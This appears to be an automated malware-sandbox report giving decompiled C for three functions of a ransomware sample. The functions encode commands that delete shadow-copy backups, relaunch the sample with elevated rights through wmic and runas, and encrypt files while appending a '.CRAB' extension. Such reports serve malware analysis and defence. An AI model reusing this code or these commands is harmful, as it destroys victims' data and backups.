                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
                                    • Instruction ID: 637e646404eb6cb80b8a736d514e822f0c95854a0e3dd1ef67768847e3690dbd
                                    • Opcode Fuzzy Hash: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
                                    • Instruction Fuzzy Hash: 1BD19F71E002168FCB24CF58C890BAAF7B1FF8A718F694569D855AB342D335F961CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 97%
                                    			E0F1445B0(void* __eflags) {
                                    				short _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				intOrPtr _v32;
                                    				intOrPtr _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				intOrPtr _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				intOrPtr _v80;
                                    				char _v84;
                                    				intOrPtr _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				intOrPtr _v100;
                                    				intOrPtr _v104;
                                    				intOrPtr _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				char _v120;
                                    				short _v124;
                                    				intOrPtr _v128;
                                    				intOrPtr _v132;
                                    				intOrPtr _v136;
                                    				intOrPtr _v140;
                                    				intOrPtr _v144;
                                    				intOrPtr _v148;
                                    				char _v152;
                                    				short _v156;
                                    				intOrPtr _v160;
                                    				intOrPtr _v164;
                                    				intOrPtr _v168;
                                    				char _v172;
                                    				short* _v176;
                                    				short* _t51;
                                    				WCHAR* _t59;
                                    				void* _t62;
                                    				signed int _t66;
                                    				void* _t69;
                                    
                                    				if(E0F143CF0(_t62) == 0) {
                                    					_v172 = 0x63005c;
                                    					_v168 = 0x64006d;
                                    					_v8 = 0;
                                    					_t59 =  &_v172;
                                    					_v164 = 0x65002e;
                                    					_t51 =  &_v84;
                                    					_v160 = 0x650078;
                                    					_v156 = 0;
                                    					_v84 = 0x63002f;
                                    					_v80 = 0x760020;
                                    					_v76 = 0x730073;
                                    					_v72 = 0x640061;
                                    					_v68 = 0x69006d;
                                    					_v64 = 0x20006e;
                                    					_v60 = 0x650064;
                                    					_v56 = 0x65006c;
                                    					_v52 = 0x650074;
                                    					_v48 = 0x730020;
                                    					_v44 = 0x610068;
                                    					_v40 = 0x6f0064;
                                    					_v36 = 0x730077;
                                    					_v32 = 0x2f0020;
                                    					_v28 = 0x6c0061;
                                    					_v24 = 0x20006c;
                                    					_v20 = 0x71002f;
                                    					_v16 = 0x690075;
                                    					_v12 = 0x740065;
                                    				} else {
                                    					_v152 = 0x77005c;
                                    					_v148 = 0x650062;
                                    					_t59 =  &_v152;
                                    					_v144 = 0x5c006d;
                                    					_t51 =  &_v120;
                                    					_v140 = 0x6d0077;
                                    					_v136 = 0x630069;
                                    					_v132 = 0x65002e;
                                    					_v128 = 0x650078;
                                    					_v124 = 0;
                                    					_v120 = 0x680073;
                                    					_v116 = 0x640061;
                                    					_v112 = 0x77006f;
                                    					_v108 = 0x6f0063;
                                    					_v104 = 0x790070;
                                    					_v100 = 0x640020;
                                    					_v96 = 0x6c0065;
                                    					_v92 = 0x740065;
                                    					_v88 = 0x65;
                                    				}
                                    				_v176 = _t51;
                                    				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
                                    				if(_t69 != 0) {
                                    					GetSystemDirectoryW(_t69, 0x100);
                                    					lstrcatW(_t69, _t59);
                                    					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
                                    					asm("sbb edi, edi");
                                    					_t66 =  ~0x20;
                                    				} else {
                                    					_t66 = 0;
                                    				}
                                    				VirtualFree(_t69, 0, 0x8000);
                                    				return _t66;
                                    			}



















































                                    0x0f1445c6
                                    0x0f144662
                                    0x0f14466c
                                    0x0f144674
                                    0x0f14467c
                                    0x0f144680
                                    0x0f144688
                                    0x0f14468c
                                    0x0f144694
                                    0x0f144699
                                    0x0f1446a1
                                    0x0f1446a9
                                    0x0f1446b1
                                    0x0f1446b9
                                    0x0f1446c1
                                    0x0f1446c9
                                    0x0f1446d4
                                    0x0f1446df
                                    0x0f1446ea
                                    0x0f1446f5
                                    0x0f144700
                                    0x0f14470b
                                    0x0f144716
                                    0x0f144721
                                    0x0f14472c
                                    0x0f144737
                                    0x0f144742
                                    0x0f14474d
                                    0x0f1445cc
                                    0x0f1445ce
                                    0x0f1445d6
                                    0x0f1445de
                                    0x0f1445e2
                                    0x0f1445ea
                                    0x0f1445ee
                                    0x0f1445f6
                                    0x0f1445fe
                                    0x0f144606
                                    0x0f14460e
                                    0x0f144613
                                    0x0f14461b
                                    0x0f144623
                                    0x0f14462b
                                    0x0f144633
                                    0x0f14463b
                                    0x0f144643
                                    0x0f14464b
                                    0x0f144653
                                    0x0f144653
                                    0x0f144766
                                    0x0f144775
                                    0x0f144779
                                    0x0f144785
                                    0x0f14478d
                                    0x0f1447a3
                                    0x0f1447ab
                                    0x0f1447ad
                                    0x0f14477b
                                    0x0f14477b
                                    0x0f14477b
                                    0x0f1447b7
                                    0x0f1447c5

                                    APIs
                                      • Part of subcall function 0F143CF0: _memset.LIBCMT ref: 0F143D42
                                      • Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F143D66
                                      • Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F143D6A
                                      • Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F143D6E
                                      • Part of subcall function 0F143CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F143D95
                                    • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0F14476F
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0F144785
                                    • lstrcatW.KERNEL32(00000000,0063005C), ref: 0F14478D
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0F1447A3
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F1447B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
                                    • String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
                                    • API String ID: 2684037697-4098772853
                                    • Opcode ID: 308ebe5118d6938eb52e0347aed5d2eeeeab581047423a7dc0fe77b5ff873d52
                                    • Instruction ID: c8e02011ff7e353556365ea2f1521415f340f839127f5dbb4bac394e62b91742
                                    • Opcode Fuzzy Hash: 308ebe5118d6938eb52e0347aed5d2eeeeab581047423a7dc0fe77b5ff873d52
                                    • Instruction Fuzzy Hash: AC4107B0148380DEE320CF119849B5BBEE6BFC5B59F10491CEA985A291C7F6958CCF97
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F143DB0(void* __ecx, void* __edx, void* __eflags) {
                                    				char _v1020;
                                    				short _v1028;
                                    				char _v1532;
                                    				short _v1540;
                                    				intOrPtr _v1548;
                                    				intOrPtr _v1552;
                                    				intOrPtr _v1556;
                                    				intOrPtr _v1560;
                                    				intOrPtr _v1564;
                                    				intOrPtr _v1568;
                                    				intOrPtr _v1572;
                                    				intOrPtr _v1576;
                                    				intOrPtr _v1580;
                                    				intOrPtr _v1584;
                                    				intOrPtr _v1588;
                                    				intOrPtr _v1592;
                                    				intOrPtr _v1596;
                                    				intOrPtr _v1600;
                                    				intOrPtr _v1604;
                                    				intOrPtr _v1608;
                                    				intOrPtr _v1612;
                                    				intOrPtr _v1616;
                                    				short _v1620;
                                    				intOrPtr _v1624;
                                    				intOrPtr _v1628;
                                    				intOrPtr _v1632;
                                    				intOrPtr _v1636;
                                    				intOrPtr _v1640;
                                    				intOrPtr _v1644;
                                    				intOrPtr _v1648;
                                    				intOrPtr _v1652;
                                    				intOrPtr _v1656;
                                    				intOrPtr _v1660;
                                    				intOrPtr _v1664;
                                    				intOrPtr _v1668;
                                    				intOrPtr _v1672;
                                    				short _v1676;
                                    				char _v1680;
                                    				int _t54;
                                    				struct HWND__* _t62;
                                    				long _t66;
                                    				void* _t76;
                                    				void* _t78;
                                    				void* _t80;
                                    
                                    				_t78 = __ecx;
                                    				_t54 = E0F143CF0(__edx);
                                    				if(_t54 != 0) {
                                    					_t54 = E0F143C70();
                                    					if(_t54 == 0) {
                                    						_v1676 = 0x770025;
                                    						_v1672 = 0x6e0069;
                                    						_v1668 = 0x690064;
                                    						_v1664 = 0x250072;
                                    						_v1660 = 0x73005c;
                                    						_v1656 = 0x730079;
                                    						_v1652 = 0x650074;
                                    						_v1648 = 0x33006d;
                                    						_v1644 = 0x5c0032;
                                    						_v1640 = 0x620077;
                                    						_v1636 = 0x6d0065;
                                    						_v1632 = 0x77005c;
                                    						_v1628 = 0x69006d;
                                    						_v1624 = 0x63;
                                    						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
                                    						_v1620 = 0x720070;
                                    						_v1616 = 0x63006f;
                                    						_v1612 = 0x730065;
                                    						_v1608 = 0x200073;
                                    						_v1604 = 0x610063;
                                    						_v1600 = 0x6c006c;
                                    						_v1596 = 0x630020;
                                    						_v1592 = 0x650072;
                                    						_v1588 = 0x740061;
                                    						_v1584 = 0x200065;
                                    						_v1580 = 0x630022;
                                    						_v1576 = 0x64006d;
                                    						_v1572 = 0x2f0020;
                                    						_v1568 = 0x200063;
                                    						_v1564 = 0x740073;
                                    						_v1560 = 0x720061;
                                    						_v1556 = 0x200074;
                                    						_v1552 = 0x730025;
                                    						_v1548 = 0x22;
                                    						wsprintfW( &_v1028,  &_v1620, _t78);
                                    						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
                                    						 *_t76 = 0x3c;
                                    						 *(_t76 + 4) = 0x40;
                                    						_t62 = GetForegroundWindow();
                                    						_t80 = 0;
                                    						 *(_t76 + 8) = _t62;
                                    						_v1680 = 0x750072;
                                    						_v1676 = 0x61006e;
                                    						_v1672 = 0x73;
                                    						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
                                    						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
                                    						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
                                    						 *(_t76 + 0x18) = 0;
                                    						 *(_t76 + 0x1c) = 0;
                                    						 *(_t76 + 0x20) = 0;
                                    						while(1) {
                                    							_t66 = ShellExecuteExW(_t76);
                                    							if(_t66 != 0) {
                                    								break;
                                    							}
                                    							_t80 = _t80 + 1;
                                    							if(_t80 < 0x64) {
                                    								continue;
                                    							}
                                    							_t54 = VirtualFree(_t76, _t66, 0x8000);
                                    							goto L6;
                                    						}
                                    						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
                                    						CloseHandle( *(_t76 + 0x38));
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				L6:
                                    				return _t54;
                                    			}















































                                    0x0f143dbf
                                    0x0f143dc1
                                    0x0f143dc8
                                    0x0f143dce
                                    0x0f143dd5
                                    0x0f143de7
                                    0x0f143df4
                                    0x0f143dfd
                                    0x0f143e05
                                    0x0f143e0d
                                    0x0f143e15
                                    0x0f143e1d
                                    0x0f143e25
                                    0x0f143e2d
                                    0x0f143e35
                                    0x0f143e3d
                                    0x0f143e45
                                    0x0f143e4d
                                    0x0f143e55
                                    0x0f143e5d
                                    0x0f143e68
                                    0x0f143e78
                                    0x0f143e81
                                    0x0f143e89
                                    0x0f143e91
                                    0x0f143e99
                                    0x0f143ea1
                                    0x0f143ea9
                                    0x0f143eb1
                                    0x0f143eb9
                                    0x0f143ec4
                                    0x0f143ecf
                                    0x0f143eda
                                    0x0f143ee5
                                    0x0f143ef0
                                    0x0f143efb
                                    0x0f143f06
                                    0x0f143f11
                                    0x0f143f1c
                                    0x0f143f27
                                    0x0f143f41
                                    0x0f143f43
                                    0x0f143f49
                                    0x0f143f50
                                    0x0f143f5c
                                    0x0f143f5e
                                    0x0f143f65
                                    0x0f143f6d
                                    0x0f143f75
                                    0x0f143f7d
                                    0x0f143f87
                                    0x0f143f91
                                    0x0f143f94
                                    0x0f143f9b
                                    0x0f143fa2
                                    0x0f143fb0
                                    0x0f143fb1
                                    0x0f143fb5
                                    0x00000000
                                    0x00000000
                                    0x0f143fb7
                                    0x0f143fbb
                                    0x00000000
                                    0x00000000
                                    0x0f143fc4
                                    0x00000000
                                    0x0f143fc4
                                    0x0f143fd6
                                    0x0f143fdf
                                    0x0f143fe7
                                    0x0f143fe7
                                    0x0f143dd5
                                    0x0f143fca
                                    0x0f143fd0

                                    APIs
                                      • Part of subcall function 0F143CF0: _memset.LIBCMT ref: 0F143D42
                                      • Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F143D66
                                      • Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F143D6A
                                      • Part of subcall function 0F143CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F143D6E
                                      • Part of subcall function 0F143CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F143D95
                                      • Part of subcall function 0F143C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F143CA0
                                    • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F143E5D
                                    • wsprintfW.USER32 ref: 0F143F27
                                    • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F143F3B
                                    • GetForegroundWindow.USER32 ref: 0F143F50
                                    • ShellExecuteExW.SHELL32(00000000), ref: 0F143FB1
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F143FC4
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F143FD6
                                    • CloseHandle.KERNEL32(?), ref: 0F143FDF
                                    • ExitProcess.KERNEL32 ref: 0F143FE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                    • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                    • API String ID: 561366689-3790645798
                                    • Opcode ID: 500ed13ceeddfb189430dc27b055a6d569120e5f89c0ccd2393ad74c6f6f833d
                                    • Instruction ID: 8a2c26620db1cd16305a510c9b1b5b74c42c886e333c68b6e56c3cd4b2281f9b
                                    • Opcode Fuzzy Hash: 500ed13ceeddfb189430dc27b055a6d569120e5f89c0ccd2393ad74c6f6f833d
                                    • Instruction Fuzzy Hash: 985149B4108341DFE3208F50D448B5ABFF9BF84759F004A1DE69886291D7FAA5ACCF96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E0F1437B0(WCHAR* __ecx, void* __edx, void* __eflags) {
                                    				long _v8;
                                    				void* _v12;
                                    				long _v16;
                                    				long _v20;
                                    				void* _v24;
                                    				void* _v28;
                                    				long _v32;
                                    				long _v36;
                                    				void _v40;
                                    				void _v44;
                                    				signed int _v48;
                                    				WCHAR* _v52;
                                    				WCHAR* _v56;
                                    				void* _v60;
                                    				void* _v64;
                                    				void* _v68;
                                    				intOrPtr _v72;
                                    				intOrPtr _v76;
                                    				short _v80;
                                    				int _v84;
                                    				char _v88;
                                    				char _v104;
                                    				char _v108;
                                    				char _v140;
                                    				char _v388;
                                    				void* _t96;
                                    				void* _t97;
                                    				struct HWND__* _t99;
                                    				void* _t101;
                                    				void* _t107;
                                    				long _t124;
                                    				long _t125;
                                    				long _t128;
                                    				WCHAR* _t145;
                                    				void* _t147;
                                    				void* _t149;
                                    				void* _t151;
                                    				WCHAR* _t162;
                                    				void* _t163;
                                    				void* _t164;
                                    				void _t165;
                                    				void* _t166;
                                    				long _t168;
                                    				void* _t173;
                                    				void* _t175;
                                    				void* _t176;
                                    				void* _t177;
                                    
                                    				_t145 = __ecx;
                                    				_t166 = __edx;
                                    				_v52 = __ecx;
                                    				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
                                    				_v20 = 0;
                                    				_v32 = 0;
                                    				_t151 = _t166;
                                    				E0F146500(_t151, 0, 0,  &_v20,  &_v32);
                                    				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                    				_v80 = 0x43002e;
                                    				_v56 = _t162;
                                    				_v76 = 0x410052;
                                    				_v72 = 0x42;
                                    				lstrcpyW(_t162, _t145);
                                    				lstrcatW(_t162,  &_v80);
                                    				asm("movdqa xmm0, [0xf150530]");
                                    				asm("movdqu [ebp-0x88], xmm0");
                                    				_push(_t151);
                                    				asm("movdqa xmm0, [0xf150530]");
                                    				asm("movdqu [ebp-0x78], xmm0");
                                    				_v108 = 0;
                                    				asm("movdqa xmm0, [0xf150530]");
                                    				asm("movdqu [ebp-0x64], xmm0");
                                    				E0F148400( &_v104, 0x10);
                                    				E0F148400( &_v140, 0x20);
                                    				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                    				asm("movdqu xmm0, [ebp-0x88]");
                                    				asm("movdqu [ebx], xmm0");
                                    				asm("movdqu xmm0, [ebp-0x78]");
                                    				_v24 = _t96;
                                    				asm("movdqu [ebx+0x10], xmm0");
                                    				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                    				asm("movdqu xmm0, [ebp-0x64]");
                                    				_t163 = _t97;
                                    				_v60 = _t163;
                                    				asm("movdqu [edi], xmm0");
                                    				_v88 = 0x20;
                                    				_v84 = 0x10;
                                    				_t99 = E0F146660(_v20, _v32, _t96,  &_v88, 0x800);
                                    				_t175 = _t173 + 0x18;
                                    				if(_t99 != 0) {
                                    					_t101 = E0F146660(_v20, _v32, _t163,  &_v84, 0x800);
                                    					_t176 = _t175 + 0x14;
                                    					if(_t101 != 0) {
                                    						E0F148520( &_v140,  &_v388);
                                    						_t177 = _t176 + 8;
                                    						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
                                    						_v28 = _t147;
                                    						if(_t147 != 0xffffffff) {
                                    							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
                                    							 *_t164 = 0;
                                    							 *(_t164 + 4) = 0;
                                    							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
                                    							_t168 = 0;
                                    							_v12 = _t107;
                                    							_v36 = 0;
                                    							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
                                    								_t124 = _v8;
                                    								if(_t124 != 0) {
                                    									_t149 = 0;
                                    									_v64 = 0;
                                    									_t168 =  <  ? 1 : _t168;
                                    									 *_t164 =  *_t164 + _t124;
                                    									asm("adc [edi+0x4], ebx");
                                    									_t125 = _v8;
                                    									_v48 = _t125;
                                    									if((_t125 & 0x0000000f) != 0) {
                                    										do {
                                    											_t125 = _t125 + 1;
                                    										} while ((_t125 & 0x0000000f) != 0);
                                    										_v8 = _t125;
                                    									}
                                    									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
                                    									E0F148B20(_t126, _v12, _v48);
                                    									_t128 = _v8;
                                    									_t177 = _t177 + 0xc;
                                    									_v40 = _t128;
                                    									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
                                    										E0F1436D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
                                    										_t149 = _v64;
                                    										_t177 = _t177 + 0x10;
                                    									}
                                    									VirtualFree(_v68, 0, 0x8000);
                                    									SetFilePointer(_v28,  ~_v48, 0, 1);
                                    									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
                                    										_t168 = 1;
                                    										_v36 = 1;
                                    									}
                                    									VirtualFree(_t149, 0, 0x8000);
                                    									_t147 = _v28;
                                    									if(_t168 == 0) {
                                    										_t107 = _v12;
                                    										continue;
                                    									}
                                    								}
                                    								break;
                                    							}
                                    							VirtualFree(_v12, 0, 0x8000);
                                    							if(_v36 == 0) {
                                    								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
                                    								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
                                    								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
                                    							}
                                    							CloseHandle(_t147);
                                    							_v40 =  *_t164;
                                    							VirtualFree(_t164, 0, 0x8000);
                                    							VirtualFree(_v24, 0, 0x8000);
                                    							VirtualFree(_v60, 0, 0x8000);
                                    							if(_v36 == 0) {
                                    								MoveFileW(_v52, _v56);
                                    							}
                                    							_t165 = _v40;
                                    						} else {
                                    							VirtualFree(_t163, 0, 0x8000);
                                    							VirtualFree(_v24, 0, 0x8000);
                                    							asm("xorps xmm0, xmm0");
                                    							asm("movlpd [ebp-0x28], xmm0");
                                    							_t165 = _v44;
                                    						}
                                    					} else {
                                    						GetLastError();
                                    						asm("xorps xmm0, xmm0");
                                    						asm("movlpd [ebp-0x28], xmm0");
                                    						_t165 = _v44;
                                    					}
                                    				} else {
                                    					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
                                    					asm("xorps xmm0, xmm0");
                                    					asm("movlpd [ebp-0x28], xmm0");
                                    					_t165 = _v44;
                                    				}
                                    				VirtualFree(_v56, 0, 0x8000);
                                    				return _t165;
                                    			}


















































                                    0x0f1437bb
                                    0x0f1437bd
                                    0x0f1437c1
                                    0x0f1437cf
                                    0x0f1437d8
                                    0x0f1437e3
                                    0x0f1437ef
                                    0x0f1437f1
                                    0x0f14380c
                                    0x0f14380e
                                    0x0f143817
                                    0x0f14381a
                                    0x0f143821
                                    0x0f143828
                                    0x0f143833
                                    0x0f143839
                                    0x0f143846
                                    0x0f14384e
                                    0x0f14384f
                                    0x0f14385a
                                    0x0f14385f
                                    0x0f143863
                                    0x0f14386b
                                    0x0f143870
                                    0x0f143880
                                    0x0f143896
                                    0x0f143898
                                    0x0f1438ae
                                    0x0f1438b4
                                    0x0f1438b9
                                    0x0f1438bc
                                    0x0f1438c1
                                    0x0f1438c3
                                    0x0f1438c8
                                    0x0f1438d3
                                    0x0f1438d6
                                    0x0f1438da
                                    0x0f1438e1
                                    0x0f1438ef
                                    0x0f1438f4
                                    0x0f1438f9
                                    0x0f143937
                                    0x0f14393c
                                    0x0f143941
                                    0x0f143970
                                    0x0f143975
                                    0x0f143993
                                    0x0f143995
                                    0x0f14399b
                                    0x0f1439db
                                    0x0f1439e9
                                    0x0f1439ef
                                    0x0f1439f6
                                    0x0f1439f8
                                    0x0f1439fa
                                    0x0f1439fd
                                    0x0f143a05
                                    0x0f143a20
                                    0x0f143a25
                                    0x0f143a2b
                                    0x0f143a37
                                    0x0f143a3a
                                    0x0f143a3d
                                    0x0f143a3f
                                    0x0f143a42
                                    0x0f143a45
                                    0x0f143a4a
                                    0x0f143a50
                                    0x0f143a50
                                    0x0f143a51
                                    0x0f143a55
                                    0x0f143a55
                                    0x0f143a6b
                                    0x0f143a72
                                    0x0f143a77
                                    0x0f143a7a
                                    0x0f143a7d
                                    0x0f143a92
                                    0x0f143aaa
                                    0x0f143aaf
                                    0x0f143ab2
                                    0x0f143ab2
                                    0x0f143abf
                                    0x0f143ad2
                                    0x0f143aed
                                    0x0f143aef
                                    0x0f143af4
                                    0x0f143af4
                                    0x0f143aff
                                    0x0f143b05
                                    0x0f143b0a
                                    0x0f143a02
                                    0x00000000
                                    0x0f143a02
                                    0x0f143b0a
                                    0x00000000
                                    0x0f143a25
                                    0x0f143b20
                                    0x0f143b26
                                    0x0f143b37
                                    0x0f143b4c
                                    0x0f143b5c
                                    0x0f143b5c
                                    0x0f143b63
                                    0x0f143b76
                                    0x0f143b79
                                    0x0f143b85
                                    0x0f143b91
                                    0x0f143b97
                                    0x0f143b9f
                                    0x0f143b9f
                                    0x0f143ba5
                                    0x0f14399d
                                    0x0f1439ab
                                    0x0f1439b7
                                    0x0f1439b9
                                    0x0f1439bc
                                    0x0f1439c4
                                    0x0f1439c4
                                    0x0f143943
                                    0x0f143943
                                    0x0f14394f
                                    0x0f143952
                                    0x0f14395a
                                    0x0f14395a
                                    0x0f1438fb
                                    0x0f143908
                                    0x0f143914
                                    0x0f143917
                                    0x0f14391f
                                    0x0f14391f
                                    0x0f143bb2
                                    0x0f143bbe

                                    APIs
                                    • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F1437C4
                                    • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F1437CF
                                    • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F14380A
                                    • lstrcpyW.KERNEL32 ref: 0F143828
                                    • lstrcatW.KERNEL32(00000000,0043002E), ref: 0F143833
                                      • Part of subcall function 0F148400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,772966A0,00000000), ref: 0F148420
                                      • Part of subcall function 0F148400: VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 0F148448
                                      • Part of subcall function 0F148400: GetModuleHandleA.KERNEL32(?), ref: 0F14849D
                                      • Part of subcall function 0F148400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F1484AB
                                      • Part of subcall function 0F148400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F1484BA
                                      • Part of subcall function 0F148400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1484DE
                                      • Part of subcall function 0F148400: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1484EC
                                      • Part of subcall function 0F148400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F143875), ref: 0F148500
                                      • Part of subcall function 0F148400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F143875), ref: 0F14850E
                                    • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F143896
                                    • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F1438C1
                                      • Part of subcall function 0F146660: EnterCriticalSection.KERNEL32(0F152A48,?,0F1438F4,00000000,00000000,00000000,?,00000800), ref: 0F14666B
                                      • Part of subcall function 0F146660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0F1438F4,00000000,00000000,00000000), ref: 0F146691
                                      • Part of subcall function 0F146660: GetLastError.KERNEL32(?,0F1438F4,00000000,00000000,00000000), ref: 0F14669B
                                      • Part of subcall function 0F146660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F1438F4,00000000,00000000,00000000), ref: 0F1466B7
                                    • MessageBoxA.USER32 ref: 0F143908
                                    • GetLastError.KERNEL32 ref: 0F143943
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F143BB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true
                                    • Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
